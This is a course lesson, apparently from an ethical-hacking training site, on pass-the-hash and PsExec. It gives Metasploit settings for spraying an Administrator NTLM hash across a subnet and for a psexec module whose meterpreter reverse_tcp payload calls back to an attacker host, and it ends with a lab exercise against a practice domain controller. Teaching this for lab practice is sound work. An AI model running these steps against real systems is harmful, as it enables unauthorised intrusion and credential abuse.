Fundamentals of Penetration Testing
Psexec and Pass the Hash (PtH) attack on a domain controller
Experimenting with NTLM Hash
When you have the NTLM hash of an Administrator user on one server, it is worth trying the same hash (and user) on other servers on the network.
You can do this with Metasploit's auxiliary/scanner/smb/smb_login module. Parameters:
- RHOSTS: 10.0.0.0/24
- SMBUser: Administrator
- SMBPass: aad3b435b51404eeaad3b435b51404ee:62...(fill in)
Remote Access
There are several different ways to use the NTLM hash to take control of a server. We will now look at a method known as "PsExec". Before we dive into that, let's go through DCE/RPC and SCM.
DCE/RPC
DCE/RPC (Distributed Computing Environment/Remote Procedure Call) is a protocol used in communication in distributed systems. It allows for data exchange and execution of operations between processes through remote connections. DCE/RPC protocol is widely used in Windows systems, including remote service startups.
In Windows, the DCE/RPC protocol is a key factor in many network services and functions. When a service needs to be started remotely, for example, from another computer or server, DCE/RPC comes into play.
SCM (Service Control Manager)
SCM is a DCE/RPC interface on Windows through which you can manage Windows services (service). The RPC service UUID for SCM is 367ABB81-9844-35F1-AD32-98F038001003.
PsExec
PsExec is not an official Windows protocol itself, but a common name for executing commands in Windows by starting a service remotely through the SCM RPC interface. The service can be, for example, "cmd.exe" and it can have a command as a parameter.
The second option is to download a file to the server through SMB sharing and run it as a service, but this is much more likely to be caught by an antivirus system than, for example, running a PowerShell command in memory.
Metasploit's psexec module
There are many remote administration tools similar to Psexec, Microsoft also has their own (whose name is Psexec, from which the name originates). There is also a version available in Metasploit, exploit/windows/smb/psexec.
Here is a picture of the source code of the psexec module in Metasploit. Note the SCM UUID and DPE/RPC reference.
The module works as follows:
- Login to IPC share using SMB.
- Start the service with SCM that starts the powershell.exe command and passes it the powershell script created by Metasploit as a parameter.
- Powershell script opens a meterpreter connection.
If PowerShell is not installed, the module can try an alternative method, such as downloading the binary to disk and starting the service from there.
Module settings are the same familiar.
- set payload windows/meterpreter/reverse_tcp
- set lhost 10.0.0.100
- set lport 1234
- set rhost 10.0.0.2
- set SMBUser Administrator
- set SMBPass aad3b435b51404eeaad3b435b51404ee:62...
Exercise
Use the SMB scanner to search for targets whose password hash is valid, then break into the domain controller (dc1.evilcorp.local) with the psexec module. Run the command in meterpreter: type C:\code.txt What is the code?
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.